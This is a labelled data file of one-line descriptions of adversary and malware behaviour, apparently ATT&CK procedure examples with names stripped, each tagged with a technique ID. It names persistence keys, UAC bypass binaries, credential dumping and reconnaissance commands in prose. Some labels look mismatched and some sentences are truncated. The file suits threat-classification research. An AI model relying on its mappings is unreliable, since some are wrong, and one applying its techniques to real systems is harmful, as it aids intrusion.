{"text1":"gathers the MAC address of the victim\u2019s machine.","labels":"['T1016']"}
{"text1":"gathers the name of the local host, version of GNU Compiler Collection (GCC), and the system information about the CPU, machine, and operating system.","labels":"['T1082']"}
{"text1":"gathers the OS version, CPU type, amount of RAM available from the victim\u2019s machine.","labels":"['T1082']"}
{"text1":"gathers the OS version, logical drives information, processor information, and volume information.","labels":"['T1082']"}
{"text1":"gathers the username from the victim\u2019s machine.","labels":"['T1033']"}
{"text1":"gathers the victim's computer name, Windows version, and system language, and then sends it to its C2 server.","labels":"['T1082']"}
{"text1":"gathers the victim's IP address and domain information, and then sends it to its C2 server.","labels":"['T1016']"}
{"text1":"gathers the victim username.","labels":"['T1033']"}
{"text1":"gathers the victim\u2019s IP address via the ipconfig -all command.","labels":"['T1016']"}
{"text1":"gathers user names from infected hosts.","labels":"['T1033']"}
{"text1":"gathers volume drive information and system information.","labels":"['T1082']"}
{"text1":"Get-Keystrokes Exfiltration module can log keystrokes.","labels":"['T1056']"}
{"text1":"Get-ProcessTokenGroup Privesc-PowerUp module can enumerate all SIDs associated with its current token.","labels":"['T1087']"}
{"text1":"Get-ProcessTokenPrivilege Privesc-PowerUp module can enumerate privileges for a given process.","labels":"['T1057']"}
{"text1":"gets an output of running processes using the tasklist command.","labels":"['T1057']"}
{"text1":"had exploited multiple vulnerabilities for execution, including Microsoft\u2019s Equation Editor (CVE-2017-11882), an Internet Explorer vulnerability (CVE-2018-8174), CVE-2017-8570, and CVE-2017-0199.","labels":"['T1203']"}
{"text1":"harvests credentials using Invoke-Mimikatz or Windows Credentials Editor (WCE).","labels":"['T1003']"}
{"text1":"has 2 methods for elevating integrity. It can bypass UAC through eventvwr.exe and sdclt.exe.","labels":"['T1548.002']"}
{"text1":"has a built-in keylogger.","labels":"['T1056']"}
{"text1":"has a built-in module for port scanning.","labels":"['T1046']"}
{"text1":"has a built-in utility command for netstat, can do net session through PowerView, and has an interactive shell which can be used to discover additional information.","labels":"['T1049']"}
{"text1":"has access to destructive malware that is capable of overwriting a machine's Master Boot Record (MBR).","labels":"['T1070.004']"}
{"text1":"has a command to collect the victim's IP address.","labels":"['T1016']"}
{"text1":"has a command to conduct timestomping by setting a specified file\u2019s timestamps to match those of a system file in the System32 directory.","labels":"['T1070.006']"}
{"text1":"has a command to create a reverse shell.","labels":"['T1059']"}
{"text1":"has a command to delete a file and deletes files after they have been successfully uploaded to C2 servers.","labels":"['T1070.004']"}
{"text1":"has a command to delete files.","labels":"['T1070.004']"}
{"text1":"has a command to delete its Registry key and scheduled task.","labels":"['T1070.004']"}
{"text1":"has a command to disable routing and the Firewall on the victim\u2019s machine.","labels":"['T1562.001']"}
{"text1":"has a command to download a file.","labels":"['T1105']"}
{"text1":"has a command to download a file from the C2 server to the victim mobile device's SD card.","labels":"['T1105']"}
{"text1":"has a command to download a file to the system from its C2 server.","labels":"['T1105']"}
{"text1":"has a command to download an .exe and use process hollowing to inject it into a new process.","labels":"['T1055.012']"}
{"text1":"has a command to download and execute an additional file.","labels":"['T1105']"}
{"text1":"has a command to download and executes additional files.","labels":"['T1105']"}
{"text1":"has a command to edit the Registry on the victim\u2019s machine.","labels":"['T1112']"}
{"text1":"has a command to gather system information from the victim\u2019s machine.","labels":"['T1082']"}
{"text1":"has a command to get text of the current foreground window.","labels":"['T1010']"}
{"text1":"has a command to get the victim's domain and NetBIOS name.","labels":"['T1016']"}
{"text1":"has a command to list account information on the victim\u2019s machine.","labels":"['T1087']"}
{"text1":"has a command to list all servers in the domain, as well as one to locate domain controllers on a domain.","labels":"['T1018']"}
{"text1":"has a command to list its directory and logical drives.","labels":"['T1083']"}
{"text1":"has a command to list the victim's processes.","labels":"['T1057']"}
{"text1":"has a command to obtain a directory listing.","labels":"['T1083']"}
{"text1":"has a command to obtain a process listing.","labels":"['T1057']"}
{"text1":"has a command to retrieve information about connected users.","labels":"['T1087']"}
{"text1":"has a command to retrieve metadata for files on disk as well as a command to list the current working directory.","labels":"['T1083']"}
{"text1":"has a command to return a list of running processes.","labels":"['T1057']"}
{"text1":"has a command to set certain attributes such as creation\/modification timestamps on files.","labels":"['T1070.006']"}
{"text1":"has a command to take a screenshot and send it to the C2 server.","labels":"['T1113']"}
{"text1":"has a command to upload a file to the victim machine.","labels":"['T1105']"}
{"text1":"has a command to upload information about all running processes to its C2 server.","labels":"['T1057']"}
{"text1":"has a command to upload to its C2 server victim browser bookmarks.","labels":"['T1217']"}
{"text1":"has a command to upload to its C2 server victim mobile device information, including IMEI, IMSI, SIM card serial number, phone number, Android version, and other information.","labels":"['T1082']"}
{"text1":"has a command to write random data across a file and delete it.","labels":"['T1070.004']"}
{"text1":"has added persistence via the Registry key HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\.","labels":"['T1547.001']"}
{"text1":"has added Registry Run keys to establish persistence.","labels":"['T1547.001']"}
{"text1":"has added the path of its second-stage malware to the startup folder to achieve persistence. One of its file stealers has also persisted by adding a Registry Run key.","labels":"['T1547.001']"}
{"text1":"has a function for decrypting data containing C2 configuration information.","labels":"['T1140']"}
{"text1":"has a keylogger.","labels":"['T1056']"}
{"text1":"has a module for loading and executing PowerShell scripts.","labels":"['T1059.001']"}
{"text1":"has a module for performing remote desktop access.","labels":"['T1021.001']"}
{"text1":"has a module to clear event logs with PowerShell.","labels":"['T1070']"}
{"text1":"has a package that collects documents from any inserted USB sticks.","labels":"['T1025']"}
{"text1":"has a plugin that can perform ARP scanning as well as port scanning.","labels":"['T1046']"}
{"text1":"has a plugin to detect active drivers of some security products.","labels":"['T1518.001']"}
{"text1":"has a plugin to drop and execute vulnerable Outpost Sandbox or avast! Virtualization drivers in order to gain kernel mode privileges.","labels":"['T1068']"}
{"text1":"has a tool called CANDYKING to capture a screenshot of user's desktop.","labels":"['T1113']"}
{"text1":"has a tool that can copy files to remote machines.","labels":"['T1105']"}
{"text1":"has a tool that can detect the existence of remote systems.","labels":"['T1018']"}
{"text1":"has a tool that can enumerate current network connections.","labels":"['T1049']"}
{"text1":"has a tool that can enumerate the permissions associated with Windows groups.","labels":"['T1069']"}
{"text1":"has a tool that can list out currently running processes.","labels":"['T1057']"}
{"text1":"has a tool that can locate credentials in files on the file system such as those from Firefox or Chrome.","labels":"['T1552.001']"}
{"text1":"has a tool that can run DLLs.","labels":"['T1218.011']"}
{"text1":"has a tool that exfiltrates data over the C2 channel.","labels":"['T1041']"}
{"text1":"has a tool that looks for files and directories on the local file system.","labels":"['T1083']"}
{"text1":"has attached a malicious document to an email to gain initial access.","labels":"['T1598.002']"}
{"text1":"has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.","labels":"['T1204']"}
{"text1":"has attempted to get users to execute malware via social media and spearphishing emails.","labels":"['T1204']"}
{"text1":"has attempted to get users to launch a malicious Microsoft Word attachment delivered via a spearphishing email.","labels":"['T1204']"}
{"text1":"has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails.","labels":"['T1204']"}
{"text1":"has attempted to get users to open malicious files by sending spearphishing emails with attachments to victims.","labels":"['T1204']"}
{"text1":"has attempted to get victims to open malicious files sent via email as part of spearphishing campaigns.","labels":"['T1204']"}
{"text1":"has attempted to get victims to open malicious Microsoft Word attachment sent via spearphishing.","labels":"['T1204']"}
{"text1":"has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.","labels":"['T1204']"}
{"text1":"has attempted to map to C$ on enumerated hosts to test the scope of their current credentials\/context.","labels":"['T1021.002']"}
{"text1":"has beaconed to its C2 over port 443.","labels":"['T1043']"}
{"text1":"has been delivered through compromised sites acting as watering holes.","labels":"['T1189']"}
{"text1":"has been known to add created accounts to local admin groups to maintain elevated access.","labels":"['T1098']"}
{"text1":"has been known to brute force password hashes to be able to leverage plain text credentials.","labels":"['T1110']"}
{"text1":"has been known to create or enable accounts, such as support_388945a0.","labels":"['T1136']"}
{"text1":"has been known to pack their tools.","labels":"['T1027.002']"}
{"text1":"has been known to remove indicators of compromise from tools.","labels":"['T1027.005']"}
{"text1":"has been known to stage files for exfiltration in a single location.","labels":"['T1074']"}
{"text1":"has been known to use credential dumping.","labels":"['T1003']"}
{"text1":"has been known to use multiple backdoors per campaign.","labels":"['T1108']"}
{"text1":"has been launched by starting iexplore.exe and replacing it with 's payload.","labels":"['T1055.012']"}
{"text1":"has been loaded onto Exchange servers and disguised as an ISAPI filter (DLL file). The IIS w3wp.exe process then loads the malicious DLL.","labels":"['T1574.002']"}
{"text1":"has been loaded through DLL side-loading of a legitimate Citrix executable that is set to persist through the registry run key location: HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ssonsvr.exe","labels":"['T1547.001']"}
{"text1":"has been observed being used to download and the Cobalt Strike Beacon payload onto victims.","labels":"['T1105']"}
{"text1":"has been observed using SQL injection to gain access to systems.","labels":"['T1190']"}
{"text1":"has been packed with the UPX packer.","labels":"['T1027.002']"}
{"text1":"has been used to decode binaries hidden inside certificate files as Base64 information.","labels":"['T1140']"}
{"text1":"has been used to execute remote commands.","labels":"['T1059']"}
{"text1":"has built in commands to identify a host\u2019s IP address and find out other network configuration settings by viewing connected sessions.","labels":"['T1016']"}
{"text1":"has bypassed UAC.","labels":"['T1548.002']"}
{"text1":"has checked for the local admin group domain admin group and Exchange Trusted Subsystem groups using the commands net group Exchange Trusted Subsystem \/domain and net group domain admins \/domain.","labels":"['T1069']"}
{"text1":"has cleared logs during post compromise cleanup activities.","labels":"['T1070']"}
{"text1":"has cleared select event log entries.","labels":"['T1070']"}
{"text1":"has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal.","labels":"['T1083']"}
{"text1":"has collected data from victims' local systems.","labels":"['T1005']"}
{"text1":"has collected emails from victim Microsoft Exchange servers.","labels":"['T1114']"}
{"text1":"has collected files from a local victim.","labels":"['T1005']"}
{"text1":"has collected information from Microsoft SharePoint services within target networks.","labels":"['T1213']"}
{"text1":"has commands to delete files and persistence mechanisms from the victim.","labels":"['T1070.004']"}
{"text1":"has commands to enumerate all storage devices and to find all files that start with a particular string.","labels":"['T1083']"}
{"text1":"has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space.","labels":"['T1083']"}
{"text1":"has commands to get the current user's name and SID.","labels":"['T1033']"}
{"text1":"has commands to get the time the machine was built, the time, and the time zone.","labels":"['T1124']"}
{"text1":"has compressed and encrypted data into password-protected RAR archives prior to exfiltration.","labels":"['T1486']"}
{"text1":"has compressed data into password-protected RAR archives prior to exfiltration.","labels":"['T1560']"}
{"text1":"has compressed files before exfiltration using TAR and RAR.","labels":"['T1560']"}
{"text1":"has compromised third parties and used compromised accounts to send spearphishing emails with targeted attachments to recipients.","labels":"['T1598.002']"}
{"text1":"has conducted port scans on a host.","labels":"['T1046']"}
{"text1":"has connected to C2 servers through proxies.","labels":"['T1090']"}
{"text1":"has copied its backdoor across open network shares, including ADMIN$, C$WINDOWS, D$WINDOWS, and E$WINDOWS.","labels":"['T1021.002']"}
{"text1":"has created a scheduled task named \u201cAdobeFlashSync\u201d to establish persistence.","labels":"['T1036']"}
{"text1":"has created forged Kerberos Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) tickets to maintain administrative access.","labels":"['T1550.003']"}
{"text1":"has created new services to establish persistence.","labels":"['T1543.003']"}
{"text1":"has created Windows tasks to establish persistence.","labels":"['T1053.005']"}
{"text1":"has deleted and overwrote files to cover tracks.","labels":"['T1070.004']"}
{"text1":"has deleted existing logs and exfiltrated file archives from a victim.","labels":"['T1070.004']"}
{"text1":"has deleted files associated with their payload after execution.","labels":"['T1070.004']"}
{"text1":"has deleted Registry keys during post compromise cleanup activities.","labels":"['T1112']"}
{"text1":"has deleted tmp and prefetch files during post compromise cleanup activities.","labels":"['T1070.004']"}
{"text1":"has delivered and by executing PowerShell commands through DDE in Word documents.","labels":"['T1559.002']"}
{"text1":"has delivered malicious links and macro-enabled documents that required targets to click the \"enable content\" button to execute the payload on the system.","labels":"['T1204']"}
{"text1":"has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server.","labels":"['T1598.003']"}
{"text1":"has delivered zero-day exploits and malware to victims via targeted emails containing malicious attachments.","labels":"['T1598.002']"}
{"text1":"has deployed a bootkit along with to ensure its persistence on the victim. The bootkit shares code with some variants of .","labels":"['T1542.003']"}
|
|
{"text1":"has deployed backup web shells and obtained OWA account credentials during intrusions that it subsequently used to attempt to regain access when evicted from a victim network.","labels":"['T1108']"}
|
|
{"text1":"has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.","labels":"['T1105']"}
|
|
{"text1":"has detached network shares after exfiltrating files, likely to evade detection.","labels":"['T1070.005']"}
|
|
{"text1":"has detected security tools.","labels":"['T1518.001']"}
|
|
{"text1":"has disabled host-based firewalls. The group has also globally opened port 3389.","labels":"['T1562.001']"}
|
|
{"text1":"has distributed targeted emails containing links to malicious documents with embedded macros.","labels":"['T1598.003']"}
|
|
{"text1":"has distributed targeted emails containing Word documents with embedded malicious macros.","labels":"['T1598.002']"}
|
|
{"text1":"has downloaded additional code and files from servers onto victims.","labels":"['T1105']"}
|
|
{"text1":"has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.","labels":"['T1105']"}
|
|
{"text1":"has downloaded additional malware, including by using .","labels":"['T1105']"}
|
|
{"text1":"has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.","labels":"['T1105']"}
|
|
{"text1":"has downloaded additional scripts and files from adversary-controlled servers. has also used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.","labels":"['T1105']"}
|
|
{"text1":"has downloaded second stage malware from compromised websites.","labels":"['T1105']"}
|
|
{"text1":"has dumped credentials, including by using .","labels":"['T1003']"}
|
|
{"text1":"has dumped credentials from victims. Specifically, the group has used the tool GET5 Penetrator to look for remote login and hard-coded credentials.","labels":"['T1003']"}
|
|
{"text1":"has encoded payloads with a single-byte XOR, both skipping the key itself and zeroing in an attempt to avoid exposing the key.","labels":"['T1027']"}
|
|
{"text1":"has encoded strings in its malware with base64 as well as with a simple, single-byte XOR obfuscation using key 0x40.","labels":"['T1027']"}
|
|
{"text1":"has encrypted and encoded data in its malware, including by using base64.","labels":"['T1027']"}
|
|
{"text1":"has encrypted C2 traffic with RC4, previously using keys of 88888888 and babybear.","labels":"['T1573']"}
|
|
{"text1":"has encrypted C2 traffic with RSA.","labels":"['T1573']"}
|
|
{"text1":"has encrypted documents and malicious executables.","labels":"['T1027']"}
|
|
{"text1":"has established persistence by creating autostart extensibility point (ASEP) Registry entries in the Run key and other Registry keys, as well as by creating shortcuts in the Internet Explorer Quick Start folder.","labels":"['T1547.001']"}
|
|
{"text1":"has established persistence by setting the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run key value for wdm to the path of the executable. It has also used the Registry entry HKEY_USERS\\Software\\Microsoft\\Windows\\CurrentVersion\\Run vpdn \u201c%ALLUSERPROFILE%\\%APPDATA%\\vpdn\\VPDN_LU.exe\u201d to establish persistence.","labels":"['T1547.001']"}
|
|
{"text1":"has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.","labels":"['T1053.005']"}
|
|
{"text1":"has established persistence by using the Registry option in PowerShell Empire to add a Run key.","labels":"['T1547.001']"}
|
|
{"text1":"has exfiltrated data in HTTP POST headers.","labels":"['T1071']"}
|
|
{"text1":"has exfiltrated data over FTP separately from its primary C2 channel over DNS.","labels":"['T1048']"}
|
|
{"text1":"has exfiltrated files stolen from file shares.","labels":"['T1039']"}
|
|
{"text1":"has exfiltrated files stolen from local systems.","labels":"['T1005']"}
|
|
{"text1":"has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.","labels":"['T1203']"}
|
|
{"text1":"has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.","labels":"['T1068']"}
|
|
{"text1":"has exploited Microsoft Word vulnerability CVE-2014-4114 for execution.","labels":"['T1203']"}
|
|
{"text1":"has exploited Microsoft Word vulnerability CVE-2017-0199 for execution.","labels":"['T1203']"}
|
|
{"text1":"has exploited the CVE-2016-0167 local vulnerability.","labels":"['T1068']"}
|
|
{"text1":"has functionality to copy itself to network shares.","labels":"['T1080']"}
|
|
{"text1":"has functionality to remove Registry Run key persistence as a cleanup procedure.","labels":"['T1112']"}
|
|
{"text1":"has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.","labels":"['T1187']"}
|
|
{"text1":"has gathered information about local network connections using .","labels":"['T1049']"}
|
|
{"text1":"has infected victims by tricking them into visiting compromised watering hole websites.","labels":"['T1189']"}
|
|
{"text1":"has infected victims using watering holes.","labels":"['T1189']"}
|
|
{"text1":"has injected SMB URLs into malicious Word spearphishing attachments to initiate .","labels":"['T1221']"}
|
|
{"text1":"has inserted garbage characters into code, presumably to avoid anti-virus detection.","labels":"['T1027.001']"}
|
|
{"text1":"has installed updates and new malware on victims.","labels":"['T1105']"}
|
|
{"text1":"has interacted with compromised systems to browse and copy files through its graphical user interface in sessions.","labels":"['T1061']"}
|
|
{"text1":"has keylogging functionality.","labels":"['T1056']"}
|
|
{"text1":"has leveraged a zero-day vulnerability to escalate privileges.","labels":"['T1068']"}
|
|
{"text1":"has leveraged multiple types of spearphishing in order to attempt to get a user to open links and attachments.","labels":"['T1204']"}
|
|
{"text1":"has masqueraded as legitimate Adobe Content Management System files.","labels":"['T1036']"}
|
|
{"text1":"has masqueraded as legitimate software update packages such as Adobe Acrobat Reader and Intel.","labels":"['T1036']"}
|
|
{"text1":"has modules that are capable of capturing audio.","labels":"['T1123']"}
|
|
{"text1":"has obfuscated code using base64 and gzip compression.","labels":"['T1027']"}
|
|
{"text1":"has obfuscated DLLs and functions using dummy API calls inserted between real instructions.","labels":"['T1027.001']"}
|
|
{"text1":"has obfuscated strings in by base64 encoding, and then encrypting them.","labels":"['T1027']"}
|
|
{"text1":"has packed malware payloads before delivery to victims.","labels":"['T1027.002']"}
|
|
{"text1":"has performed C2 using DNS via A, OPT, and TXT records.","labels":"['T1071']"}
|
|
{"text1":"has performed credential dumping with and Lazagne.","labels":"['T1003']"}
|
|
{"text1":"has performed DLL search order hijacking to execute their payload.","labels":"['T1574.001']"}
|
|
{"text1":"has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil).","labels":"['T1113']"}
|
|
{"text1":"has performed timestomping on victim files.","labels":"['T1070.006']"}
|
|
{"text1":"has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.","labels":"['T1102']"}
|
|
{"text1":"has registered a Windows shell script under the Registry key HKCU\\Environment\\UserInitMprLogonScript to establish persistence.","labels":"['T1037']"}
|
|
{"text1":"has registered itself as a scheduled task to run each time the current user logs in.","labels":"['T1053.005']"}
|
|
{"text1":"has registered itself as a service to establish persistence.","labels":"['T1543.003']"}
|
|
{"text1":"has registered its persistence module on domain controllers as a Windows LSA (Local System Authority) password filter to dump credentials any time a domain, local user, or administrator logs in or changes a password.","labels":"['T1003']"}
|
|
{"text1":"has retrieved internal documents from machines inside victim environments, including by using to stage documents before.","labels":"['T1005']"}
|
|
{"text1":"has run a keylogger plug-in on a victim.","labels":"['T1056']"}
|
|
{"text1":"has run a plug-in on a victim to spread through the local network by using and accessing admin shares.","labels":"['T1021.002']"}
|
|
{"text1":"has run hostname and systeminfo on a victim.","labels":"['T1082']"}
|
|
{"text1":"has run net user, net user \/domain, net group \u201cdomain admins\u201d \/domain, and net group \u201cExchange Trusted Subsystem\u201d \/domain to get account listings on a victim.","labels":"['T1087']"}
|
|
{"text1":"has run whoami on a victim.","labels":"['T1033']"}
|
|
{"text1":"has sent a C2 response that was base64-encoded.","labels":"['T1132']"}
|
|
{"text1":"has sent malicious Office documents via email as part of spearphishing campaigns as well as executables disguised as documents.","labels":"['T1598.002']"}
|
|
{"text1":"has sent malicious Word OLE compound documents to victims.","labels":"['T1559.002']"}
|
|
{"text1":"has sent malware that required users to hit the enable button in Microsoft Excel to allow an .iqy file to be downloaded.","labels":"['T1204']"}
|
|
{"text1":"has sent spearphishing attachments attempting to get a user to open them.","labels":"['T1204']"}
|
|
{"text1":"has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.","labels":"['T1598.002']"}
|
|
{"text1":"has sent spearphishing emails with various attachment types to corporate and personal email accounts of victim organizations. Attachment types have included .rtf, .doc, .xls, archives containing LNK files, and password protected archives containing .exe and .scr executables.","labels":"['T1598.002']"}
|
|
{"text1":"has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution. The group has also used an exploit toolkit known as Threadkit that launches .bat files.","labels":"['T1064']"}
|
|
{"text1":"has several modules that search the Windows Registry for stored credentials: Get-UnattendedInstallFile, Get-Webconfig, Get-ApplicationHost, Get-SiteListPassword, Get-CachedGPPPassword, and Get-RegistryAutoLogon.","labels":"['T1552.002']"}
|
|
{"text1":"has sometimes used drive-by attacks against vulnerable browser plugins.","labels":"['T1189']"}
|
|
{"text1":"has staged encrypted archives for exfiltration on Internet-facing servers that had previously been compromised with .","labels":"['T1074']"}
|
|
{"text1":"has targeted victims using spearphishing emails with malicious Microsoft Word attachments.","labels":"['T1598.002']"}
|
|
{"text1":"has targeted victims with spearphishing emails containing malicious Microsoft Word documents.","labels":"['T1598.002']"}
|
|
{"text1":"has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion.","labels":"['T1027.005']"}
|
|
{"text1":"has the ability to create a reverse shell.","labels":"['T1059']"}
|
|
{"text1":"has the ability to discover and manipulate Windows services.","labels":"['T1007']"}
|
|
{"text1":"has the ability to download and execute additional files.","labels":"['T1105']"}
|
|
{"text1":"has the ability to download files.","labels":"['T1105']"}
|
|
{"text1":"has the ability to enumerate drive types.","labels":"['T1083']"}
|
|
{"text1":"has the ability to enumerate processes.","labels":"['T1057']"}
|
|
{"text1":"has the ability to enumerate system information.","labels":"['T1082']"}
|
|
{"text1":"has the ability to execute shell commands.","labels":"['T1059']"}
|
|
{"text1":"has the ability to identify any anti-virus installed on the infected system.","labels":"['T1518.001']"}
|
|
{"text1":"has the ability to initiate keylogging and screen captures.","labels":"['T1113']"}
|
|
{"text1":"has the ability to list processes on the system.","labels":"['T1057']"}
|
|
{"text1":"has the ability to modify the Registry.","labels":"['T1112']"}
|
|
{"text1":"has the ability to obtain screenshots of the compromised system.","labels":"['T1113']"}
|
|
{"text1":"has the ability to remove Registry entries that it created during execution.","labels":"['T1070']"}
|
|
{"text1":"has the ability to scan for security tools such as firewalls and antivirus tools.","labels":"['T1518.001']"}
|
|
{"text1":"has the ability to search for a given filename on a victim.","labels":"['T1083']"}
|
|
{"text1":"has the ability to upload and download files from its C2 server.","labels":"['T1105']"}
|
|
{"text1":"has the capability to access the webcam on the victim\u2019s machine.","labels":"['T1125']"}
|
|
{"text1":"has the capability to add its own account to the victim's machine.","labels":"['T1136']"}
|
|
{"text1":"has the capability to capture audio from a victim machine.","labels":"['T1123']"}
|
|
{"text1":"has the capability to capture keystrokes.","labels":"['T1056']"}
|
|
{"text1":"has the capability to capture screenshots.","labels":"['T1113']"}
|
|
{"text1":"has the capability to capture video from a victim machine.","labels":"['T1125']"}
|
|
{"text1":"has the capability to communicate over a backup channel via plus.google.com.","labels":"['T1008']"}
|
|
{"text1":"has the capability to create a remote shell.","labels":"['T1059']"}
|
|
{"text1":"has the capability to create a remote shell and execute specified commands.","labels":"['T1059']"}
|
|
{"text1":"has the capability to create a reverse shell.","labels":"['T1059']"}
|
|
{"text1":"has the capability to create a reverse shell on victims.","labels":"['T1059']"}
|
|
{"text1":"has the capability to delete files off the victim\u2019s machine.","labels":"['T1070.004']"}
|
|
{"text1":"has the capability to delete local files.","labels":"['T1070.004']"}
|
|
{"text1":"has the capability to discover processes.","labels":"['T1057']"}
|
|
{"text1":"has the capability to download a file to the victim from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"has the capability to download files.","labels":"['T1105']"}
|
|
{"text1":"has the capability to download files from the C2 server.","labels":"['T1105']"}
|
|
{"text1":"has the capability to enumerate files.","labels":"['T1083']"}
|
|
{"text1":"has the capability to execute the command ipconfig \/all.","labels":"['T1016']"}
|
|
{"text1":"has the capability to execute the command net start to interact with services.","labels":"['T1007']"}
|
|
{"text1":"has the capability to execute ver, systeminfo, and gpresult commands.","labels":"['T1082']"}
|
|
{"text1":"has the capability to gather the IP address from the victim's machine.","labels":"['T1016']"}
|
|
{"text1":"has the capability to gather the system\u2019s hostname and OS version.","labels":"['T1082']"}
|
|
{"text1":"has the capability to gather the username from the victim's machine.","labels":"['T1033']"}
|
|
{"text1":"has the capability to gather the victim's current directory.","labels":"['T1083']"}
|
|
{"text1":"has the capability to gather the victim's proxy information.","labels":"['T1016']"}
|
|
{"text1":"has the capability to identify remote hosts on connected networks.","labels":"['T1018']"}
|
|
{"text1":"has the capability to log keystrokes from the victim\u2019s machine.","labels":"['T1056']"}
|
|
{"text1":"has the capability to obtain a listing of running processes (including loaded modules).","labels":"['T1057']"}
|
|
{"text1":"has the capability to obtain file and directory listings.","labels":"['T1083']"}
|
|
{"text1":"has the capability to open a remote shell and run basic commands.","labels":"['T1059']"}
|
|
{"text1":"has the capability to retrieve information about groups.","labels":"['T1069']"}
|
|
{"text1":"has the capability to retrieve information about shares on remote hosts.","labels":"['T1135']"}
|
|
{"text1":"has the capability to retrieve information about the OS.","labels":"['T1082']"}
|
|
{"text1":"has the capability to retrieve information about users on remote hosts.","labels":"['T1087']"}
|
|
{"text1":"has the capability to scan for open ports on hosts in a connected network.","labels":"['T1046']"}
|
|
{"text1":"has the capability to schedule remote AT jobs.","labels":"['T1053.005']"}
|
|
{"text1":"has the capability to take screenshots of the victim\u2019s machine.","labels":"['T1113']"}
|
|
{"text1":"has the capability to use rm -rf to remove folders and files from the victim's machine.","labels":"['T1070.004']"}
|
|
{"text1":"has transferred files using the Intel\u00ae Active Management Technology (AMT) Serial-over-LAN (SOL) channel.","labels":"['T1105']"}
|
|
{"text1":"has tunneled RDP backdoors over port 443.","labels":"['T1043']"}
|
|
{"text1":"has updated and modified its malware, resulting in different hash values that evade detection.","labels":"['T1027.005']"}
|
|
{"text1":"has used , a RAT that uses HTTP to communicate.","labels":"['T1071']"}
|
|
{"text1":"has used a Batch file to automate frequently executed post compromise cleanup activities.","labels":"['T1064']"}
|
|
{"text1":"has used a batch script that adds a Registry Run key to establish malware persistence.","labels":"['T1547.001']"}
|
|
{"text1":"has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors.","labels":"['T1140']"}
|
|
{"text1":"has used a global service provider's IP as a proxy for C2 traffic from a victim.","labels":"['T1090']"}
|
|
{"text1":"has used a keylogging tool called KEYPUNCH.","labels":"['T1056']"}
|
|
{"text1":"has used a keylogging tool that records keystrokes in encrypted files.","labels":"['T1056']"}
|
|
{"text1":"has used a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.","labels":"['T1059.001']"}
|
|
{"text1":"has used a Metasploit PowerShell module to download and execute shellcode and to set up a local listener. has also used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.","labels":"['T1064']"}
|
|
{"text1":"has used an audio capturing utility known as SOUNDWAVE that captures microphone input.","labels":"['T1123']"}
|
|
{"text1":"has used Android backdoors capable of enumerating specific files on the infected devices.","labels":"['T1083']"}
|
|
{"text1":"has used Android backdoors capable of exfiltrating specific files directly from the infected devices.","labels":"['T1005']"}
|
|
{"text1":"has used and to register a scheduled task to execute malware during lateral movement.","labels":"['T1053.005']"}
|
|
{"text1":"has used an RSS feed on Livejournal to update a list of encrypted C2 server names.","labels":"['T1102']"}
|
|
{"text1":"has used AOL Instant Messenger for C2.","labels":"['T1102']"}
|
|
{"text1":"has used appcmd.exe to disable logging on a victim server.","labels":"['T1562.001']"}
|
|
{"text1":"has used application shim databases for persistence.","labels":"['T1546.011']"}
|
|
{"text1":"has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process.","labels":"['T1547.001']"}
|
|
{"text1":"has used a scheduled task for persistence.","labels":"['T1053.005']"}
|
|
{"text1":"has used a script (atexec.py) to execute a command on a target machine via Task Scheduler.","labels":"['T1053.005']"}
|
|
{"text1":"has used a tool known as RemoteExec (similar to ) to remotely execute batch scripts and binaries.","labels":"['T1569.002']"}
|
|
{"text1":"has used a tool that can obtain info about local and global group users, power users, and administrators.","labels":"['T1087']"}
|
|
{"text1":"has used a tool to capture screenshots.","labels":"['T1113']"}
|
|
{"text1":"has used a tool to dump credentials by injecting itself into lsass.exe and triggering with the argument \"dig.\" The group has also used tools to dump passwords from browsers.","labels":"['T1003']"}
|
|
{"text1":"has used automated collection.","labels":"['T1119']"}
|
|
{"text1":"has used a variant of NanoCore RAT that communicates with its C2 server over port 6666.","labels":"['T1571']"}
|
|
{"text1":"has used batch scripting to automate execution of commands.","labels":"['T1064']"}
|
|
{"text1":"has used batch scripts and scheduled tasks to delete critical system files.","labels":"['T1070.004']"}
|
|
{"text1":"has used batch scripts in its malware to install persistence mechanisms.","labels":"['T1064']"}
|
|
{"text1":"has used bitsadmin.exe to download additional tools.","labels":"['T1197']"}
|
|
{"text1":"has used brute force techniques to obtain credentials.","labels":"['T1110']"}
|
|
{"text1":"has used C:\\Windows\\Debug and C:\\Perflogs as staging directories.","labels":"['T1074']"}
|
|
{"text1":"has used cmd.exe to execute commands.","labels":"['T1059']"}
|
|
{"text1":"has used CMSTP.exe and a malicious INF to execute its payload.","labels":"['T1218.003']"}
|
|
{"text1":"has used code-signing certificates on its malware that are either forged due to weak keys or stolen.","labels":"['T1553.002']"}
|
|
{"text1":"has used COM hijacking for persistence by replacing the legitimate MMDeviceEnumerator object with a payload.","labels":"['T1546.015']"}
|
|
